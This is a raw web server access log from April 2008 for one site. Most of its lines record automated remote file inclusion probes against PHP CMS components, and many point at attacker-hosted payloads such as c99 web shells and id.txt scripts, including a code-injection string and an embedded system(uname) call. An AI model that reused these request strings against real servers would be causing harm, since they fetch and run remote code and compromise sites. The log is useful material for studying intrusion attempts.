163.26.229.171 - - [08/Apr/2008:12:22:07 -0700] "GET /logs/access_080313.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://61.129.163.4/on.txt?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
163.26.229.171 - - [08/Apr/2008:12:22:08 -0700] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://61.129.163.4/on.txt?????? HTTP/1.1" 200 4139 "-" "libwww-perl/5.65" "www.dmulk.com"
163.26.229.171 - - [08/Apr/2008:12:22:09 -0700] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://61.129.163.4/on.txt?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
77.222.128.242 - - [08/Apr/2008:12:22:22 -0700] "GET /logs/access_080124.log//inc/cmses/aedating4CMS.php?dir[inc]=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
69.57.130.70 - - [08/Apr/2008:12:23:08 -0700] "GET /logs/access.log/main.php?inc=http://www.dosbrteam.com.br/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
221.190.13.182 - - [08/Apr/2008:12:24:02 -0700] "GET /logs/access_080309.log HTTP/1.1" 200 1833710 "-" "ulyp3r pxbwixryhwDwxuk vhpw" "www.dmulk.com"
221.190.13.182 - - [08/Apr/2008:12:24:10 -0700] "GET /logs/access_080312.log HTTP/1.1" 200 1893701 "-" "DjftkpaaacvDwoicDxxirvwxx omotdkbwij" "www.dmulk.com"
83.12.119.178 - - [08/Apr/2008:12:24:12 -0700] "GET /logs/access_080126.log/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://www.priproqua.altervista.org/php5/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
83.12.119.178 - - [08/Apr/2008:12:24:16 -0700] "GET /phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://www.priproqua.altervista.org/php5/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
83.12.119.178 - - [08/Apr/2008:12:24:17 -0700] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://www.priproqua.altervista.org/php5/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
81.169.183.122 - - [08/Apr/2008:12:24:40 -0700] "GET /logs/access_080123.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://webshell.hit.bg/c99.php? HTTP/1.1" 404 275 "-" "Googlebot/2.1 (+http://www.googlebot.com/bot.html)" "www.dmulk.com"
85.18.201.175 - - [08/Apr/2008:12:24:48 -0700] "GET /logs/access.log//ashnews.php?pathtoashnews=http://www.embudu.fr/unic/vwar/albania.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.22.2.74 - - [08/Apr/2008:12:24:50 -0700] "GET //modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://southernlivingfurnitureusa.com/news/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
216.22.2.74 - - [08/Apr/2008:12:24:51 -0700] "GET /logs//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://southernlivingfurnitureusa.com/news/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
85.18.201.175 - - [08/Apr/2008:12:24:54 -0700] "GET //ashnews.php?pathtoashnews=http://www.embudu.fr/unic/vwar/albania.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.193.224.190 - - [08/Apr/2008:12:24:54 -0700] "GET /logs/access_080306.log/modules/My_eGallery/index.php?basepath=http://ann.superprast.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
85.18.201.175 - - [08/Apr/2008:12:24:55 -0700] "GET /logs//ashnews.php?pathtoashnews=http://www.embudu.fr/unic/vwar/albania.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.114.132.100 - - [08/Apr/2008:12:24:59 -0700] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://webshell.hit.bg/c99.php? HTTP/1.1" 404 275 "-" "Googlebot/2.1 (+http://www.googlebot.com/bot.html)" "www.dmulk.com"
128.197.11.30 - - [08/Apr/2008:12:25:19 -0700] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://webshell.hit.bg/c99.php? HTTP/1.1" 404 275 "-" "Googlebot/2.1 (+http://www.googlebot.com/bot.html)" "www.dmulk.com"
205.234.253.11 - - [08/Apr/2008:12:25:35 -0700] "GET /logs/access.log/main.php?inc=http://www.dosbrteam.com.br/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.6.8.104 - - [08/Apr/2008:12:25:46 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
85.18.201.175 - - [08/Apr/2008:12:25:48 -0700] "GET /logs/access_080329.log//ashnews.php?pathtoashnews=http://www.embudu.fr/unic/vwar/albania.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.6.8.23 - - [08/Apr/2008:12:26:05 -0700] "GET /minamijewelry/html/dream.html HTTP/1.0" 304 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
88.191.19.109 - - [08/Apr/2008:12:26:06 -0700] "GET /logs//components/com_flyspray/startdown.php?file=http://www.sohbetsuper.org/modules/shoutbox/box?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.dmulk.com"
64.235.56.178 - - [08/Apr/2008:12:26:07 -0700] "GET /index2.php?mosConfig_absolute_path=http://kaizo.hut2.ru/new/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" "www.dmulk.com"
64.235.56.178 - - [08/Apr/2008:12:26:08 -0700] "GET /logs/index2.php?mosConfig_absolute_path=http://kaizo.hut2.ru/new/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" "www.dmulk.com"
88.191.19.109 - - [08/Apr/2008:12:26:11 -0700] "GET //components/com_flyspray/startdown.php?file=http://www.sohbetsuper.org/modules/shoutbox/box?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.dmulk.com"
83.12.119.178 - - [08/Apr/2008:12:26:40 -0700] "GET /logs/access_080126.log/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://www.priproqua.altervista.org/php5/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
83.12.119.178 - - [08/Apr/2008:12:26:41 -0700] "GET /phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://www.priproqua.altervista.org/php5/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
83.12.119.178 - - [08/Apr/2008:12:26:43 -0700] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://www.priproqua.altervista.org/php5/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
85.18.201.175 - - [08/Apr/2008:12:26:50 -0700] "GET /logs/access_080324.log//atom.php5?page=http://www.embudu.fr/unic/vwar/albania.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.18.201.175 - - [08/Apr/2008:12:26:51 -0700] "GET //atom.php5?page=http://www.embudu.fr/unic/vwar/albania.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.18.201.175 - - [08/Apr/2008:12:26:57 -0700] "GET /logs//atom.php5?page=http://www.embudu.fr/unic/vwar/albania.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.118.85.129 - - [08/Apr/2008:12:27:39 -0700] "GET /logs/access_080105.log/index.php?incl=http://www.prepaidcard.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.126.144.75 - - [08/Apr/2008:12:28:01 -0700] "GET /index2.php?mosConfig_absolute_path=http://kaizo.hut2.ru/new/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
209.126.144.75 - - [08/Apr/2008:12:28:01 -0700] "GET /logs/index2.php?mosConfig_absolute_path=http://kaizo.hut2.ru/new/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
70.42.130.240 - - [08/Apr/2008:12:28:41 -0700] "GET //doceboCms/class/class.dashboard_cms.php?where_framework=http://kingsofwarcraft.com/info? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
70.42.130.240 - - [08/Apr/2008:12:28:42 -0700] "GET //doceboCms/class/class.dashboard_cms.php?where_framework=http://kingsofwarcraft.com/info? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
206.190.65.132 - - [08/Apr/2008:12:28:48 -0700] "GET /logs/access.log/index.php?place=http://www.skg-sprendlingen.de/_test/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
61.222.36.82 - - [08/Apr/2008:12:28:48 -0700] "GET /classes/core/language.php?rootdir=http://61.129.163.4/on.txt?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
206.190.65.132 - - [08/Apr/2008:12:28:50 -0700] "GET /index.php?place=http://www.skg-sprendlingen.de/_test/id.txt?? HTTP/1.1" 200 7371 "-" "libwww-perl/5.808" "www.dmulk.com"
206.190.65.132 - - [08/Apr/2008:12:28:50 -0700] "GET /logs/index.php?place=http://www.skg-sprendlingen.de/_test/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
85.18.201.175 - - [08/Apr/2008:12:29:54 -0700] "GET /logs/access.log//atom.php5?page=http://www.embudu.fr/unic/vwar/albania.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.12.119.178 - - [08/Apr/2008:12:31:07 -0700] "GET /logs/access_080112.log/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://www.priproqua.altervista.org/php5/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
70.47.36.29 - - [08/Apr/2008:12:31:17 -0700] "GET /logs/access_080218.log/akocomments.phppublic_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.nextlesson.com//cache/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.47.36.29 - - [08/Apr/2008:12:31:17 -0700] "GET /akocomments.phppublic_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.nextlesson.com//cache/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.47.36.29 - - [08/Apr/2008:12:31:18 -0700] "GET /logs/akocomments.phppublic_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.nextlesson.com//cache/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
213.198.89.199 - - [08/Apr/2008:12:31:27 -0700] "GET /index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://geocities.com/wisnu_amanda/wisnu.txt?? HTTP/1.1" 200 7371 "-" "libwww-perl/5.65" "www.dmulk.com"
213.198.89.199 - - [08/Apr/2008:12:31:34 -0700] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://geocities.com/wisnu_amanda/wisnu.txt?? HTTP/1.1" 200 7371 "-" "libwww-perl/5.65" "www.dmulk.com"
189.38.50.24 - - [08/Apr/2008:12:31:52 -0700] "GET /logs/access_080218.log/akocomments.phppublic_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://sbc.sytu.edu.cn/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
189.38.50.24 - - [08/Apr/2008:12:31:53 -0700] "GET /akocomments.phppublic_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://sbc.sytu.edu.cn/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
189.38.50.24 - - [08/Apr/2008:12:31:53 -0700] "GET /logs/akocomments.phppublic_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://sbc.sytu.edu.cn/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
195.205.178.120 - - [08/Apr/2008:12:32:06 -0700] "GET /logs/access_080218.log/akocomments.phppublic_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://ezsm.ru/media/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
195.205.178.120 - - [08/Apr/2008:12:32:07 -0700] "GET /akocomments.phppublic_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://ezsm.ru/media/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
195.205.178.120 - - [08/Apr/2008:12:32:07 -0700] "GET /logs/akocomments.phppublic_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://ezsm.ru/media/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
212.247.251.105 - - [08/Apr/2008:12:32:20 -0700] "GET /logs/access_080218.log/akocomments.phppublic_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://ezsm.ru/media/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
212.247.251.105 - - [08/Apr/2008:12:32:21 -0700] "GET /akocomments.phppublic_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://ezsm.ru/media/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
212.247.251.105 - - [08/Apr/2008:12:32:21 -0700] "GET /logs/akocomments.phppublic_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://ezsm.ru/media/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
70.47.36.29 - - [08/Apr/2008:12:32:42 -0700] "GET /logs/access_080308.log/akocomments.phppublic_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.nextlesson.com//cache/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.126.144.75 - - [08/Apr/2008:12:33:10 -0700] "GET /index2.php?mosConfig_absolute_path=http://kaizo.hut2.ru/new/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
209.126.144.75 - - [08/Apr/2008:12:33:11 -0700] "GET /logs/index2.php?mosConfig_absolute_path=http://kaizo.hut2.ru/new/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
83.12.119.178 - - [08/Apr/2008:12:33:33 -0700] "GET /logs/access_080112.log/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://www.priproqua.altervista.org/php5/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
64.235.56.178 - - [08/Apr/2008:12:33:35 -0700] "GET /index2.php?mosConfig_absolute_path=http://kaizo.hut2.ru/new/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" "www.dmulk.com"
64.235.56.178 - - [08/Apr/2008:12:33:35 -0700] "GET /logs/index2.php?mosConfig_absolute_path=http://kaizo.hut2.ru/new/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" "www.dmulk.com"
195.205.178.120 - - [08/Apr/2008:12:35:08 -0700] "GET /logs/access_080308.log/akocomments.phppublic_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://ezsm.ru/media/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
205.234.129.50 - - [08/Apr/2008:12:35:21 -0700] "GET /logs/access.log//index.php?option=frontpage&Itemid=system(uname)http://axovul.iespana.es/socaon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
205.234.129.50 - - [08/Apr/2008:12:35:23 -0700] "GET //index.php?option=frontpage&Itemid=system(uname)http://axovul.iespana.es/socaon.txt?? HTTP/1.1" 200 7371 "-" "libwww-perl/5.808" "www.dmulk.com"
205.234.129.50 - - [08/Apr/2008:12:35:23 -0700] "GET /logs//index.php?option=frontpage&Itemid=system(uname)http://axovul.iespana.es/socaon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
213.198.89.199 - - [08/Apr/2008:12:35:42 -0700] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://geocities.com/wisnu_amanda/wisnu.txt?? HTTP/1.1" 200 7371 "-" "libwww-perl/5.65" "www.dmulk.com"
195.137.139.73 - - [08/Apr/2008:12:36:36 -0700] "GET //administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.geocities.com/nialeva/metal.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
216.22.2.74 - - [08/Apr/2008:12:37:12 -0700] "GET /logs/access_080225.log//doceboCms/class/class.dashboard_cms.php?where_framework=http://203.71.212.3/www/modul/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
216.22.2.74 - - [08/Apr/2008:12:37:12 -0700] "GET /logs//doceboCms/class/class.dashboard_cms.php?where_framework=http://203.71.212.3/www/modul/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
200.230.71.1 - - [08/Apr/2008:12:37:30 -0700] "GET /logs/access_071225.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://boxstr.com/files/1311840_mm1dt/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.230.71.1 - - [08/Apr/2008:12:37:31 -0700] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://boxstr.com/files/1311840_mm1dt/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.230.71.1 - - [08/Apr/2008:12:37:32 -0700] "GET /logs/access_071220.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://boxstr.com/files/1311840_mm1dt/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
189.38.50.24 - - [08/Apr/2008:12:38:02 -0700] "GET /logs/access_080308.log/akocomments.phppublic_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://sbc.sytu.edu.cn/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
194.79.75.195 - - [08/Apr/2008:12:38:11 -0700] "GET /logs/?mosConfig_absolute_path=http://www.partypig.de/components/com_remository_files/cmd7.gif?? HTTP/1.1" 200 42265 "-" "Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)" "www.dmulk.com"
194.79.75.195 - - [08/Apr/2008:12:38:12 -0700] "GET /?mosConfig_absolute_path=http://www.partypig.de/components/com_remository_files/cmd7.gif?? HTTP/1.1" 200 7371 "-" "Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)" "www.dmulk.com"
216.22.2.74 - - [08/Apr/2008:12:38:20 -0700] "GET /logs/access_080308.log//doceboCms/class/class.dashboard_cms.php?where_framework=http://203.71.212.3/www/modul/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
213.221.88.99 - - [08/Apr/2008:12:38:22 -0700] "GET /logs/?mosConfig_absolute_path=http://www.partypig.de/components/com_remository_files/cmd7.gif?? HTTP/1.1" 200 42265 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.dmulk.com"
213.221.88.99 - - [08/Apr/2008:12:38:24 -0700] "GET /?mosConfig_absolute_path=http://www.partypig.de/components/com_remository_files/cmd7.gif?? HTTP/1.1" 200 7371 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.dmulk.com"
206.190.65.132 - - [08/Apr/2008:12:39:46 -0700] "GET /logs/access_080113.log/index.php?place=http://www.skg-sprendlingen.de/_test/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.235.56.178 - - [08/Apr/2008:12:40:42 -0700] "GET /logs/index.php?mosConfig_absolute_path=http://kaizo.hut2.ru/new/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" "www.dmulk.com"
64.235.56.178 - - [08/Apr/2008:12:40:43 -0700] "GET /index.php?mosConfig_absolute_path=http://kaizo.hut2.ru/new/test.txt?? HTTP/1.1" 200 7371 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" "www.dmulk.com"
212.247.251.105 - - [08/Apr/2008:12:40:53 -0700] "GET /logs/access_080308.log/akocomments.phppublic_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://ezsm.ru/media/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
64.235.56.178 - - [08/Apr/2008:12:41:27 -0700] "GET /logs/index.php?mosConfig_absolute_path=http://kaizo.hut2.ru/new/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" "www.dmulk.com"
64.235.56.178 - - [08/Apr/2008:12:41:28 -0700] "GET /index.php?mosConfig_absolute_path=http://kaizo.hut2.ru/new/test.txt?? HTTP/1.1" 200 7371 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" "www.dmulk.com"
87.106.179.153 - - [08/Apr/2008:12:41:34 -0700] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://www.partypig.de/components/com_remository_files/cmd7.gif?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)" "www.dmulk.com"
87.106.179.153 - - [08/Apr/2008:12:41:34 -0700] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.partypig.de/components/com_remository_files/cmd7.gif?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)" "www.dmulk.com"
209.126.144.75 - - [08/Apr/2008:12:42:12 -0700] "GET /logs/index.php?mosConfig_absolute_path=http://kaizo.hut2.ru/new/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
64.235.56.178 - - [08/Apr/2008:12:42:13 -0700] "GET /logs/index.php?mosConfig_absolute_path=http://kaizo.hut2.ru/new/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" "www.dmulk.com"
64.235.56.178 - - [08/Apr/2008:12:42:15 -0700] "GET /index.php?mosConfig_absolute_path=http://kaizo.hut2.ru/new/test.txt?? HTTP/1.1" 200 7371 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" "www.dmulk.com"
209.126.144.75 - - [08/Apr/2008:12:42:18 -0700] "GET /index.php?mosConfig_absolute_path=http://kaizo.hut2.ru/new/test.txt?? HTTP/1.1" 200 7371 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
64.235.56.178 - - [08/Apr/2008:12:43:41 -0700] "GET /logs/index2.php?mosConfig_absolute_path=http://kaizo.hut2.ru/new/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" "www.dmulk.com"
64.235.56.178 - - [08/Apr/2008:12:43:41 -0700] "GET /index2.php?mosConfig_absolute_path=http://kaizo.hut2.ru/new/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" "www.dmulk.com"
64.235.56.178 - - [08/Apr/2008:12:44:30 -0700] "GET /logs/index2.php?mosConfig_absolute_path=http://kaizo.hut2.ru/new/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" "www.dmulk.com"
64.235.56.178 - - [08/Apr/2008:12:44:30 -0700] "GET /index2.php?mosConfig_absolute_path=http://kaizo.hut2.ru/new/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" "www.dmulk.com"
209.126.144.75 - - [08/Apr/2008:12:44:52 -0700] "GET /logs/index.php?mosConfig_absolute_path=http://kaizo.hut2.ru/new/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
209.126.144.75 - - [08/Apr/2008:12:44:54 -0700] "GET /index.php?mosConfig_absolute_path=http://kaizo.hut2.ru/new/test.txt?? HTTP/1.1" 200 7371 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
64.235.56.178 - - [08/Apr/2008:12:45:34 -0700] "GET /logs/index.php?mosConfig_absolute_path=http://kaizo.hut2.ru/new/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" "www.dmulk.com"
64.235.56.178 - - [08/Apr/2008:12:45:34 -0700] "GET /index.php?mosConfig_absolute_path=http://kaizo.hut2.ru/new/test.txt?? HTTP/1.1" 200 7371 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" "www.dmulk.com"
64.235.56.178 - - [08/Apr/2008:12:45:38 -0700] "GET /logs/index.php?mosConfig_absolute_path=http://kaizo.hut2.ru/new/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" "www.dmulk.com"
64.235.56.178 - - [08/Apr/2008:12:45:39 -0700] "GET /index.php?mosConfig_absolute_path=http://kaizo.hut2.ru/new/test.txt?? HTTP/1.1" 200 7371 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" "www.dmulk.com"
74.6.8.93 - - [08/Apr/2008:12:47:02 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.6.29.160 - - [08/Apr/2008:12:47:03 -0700] "GET /retreat1/?M=D HTTP/1.0" 200 15065 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
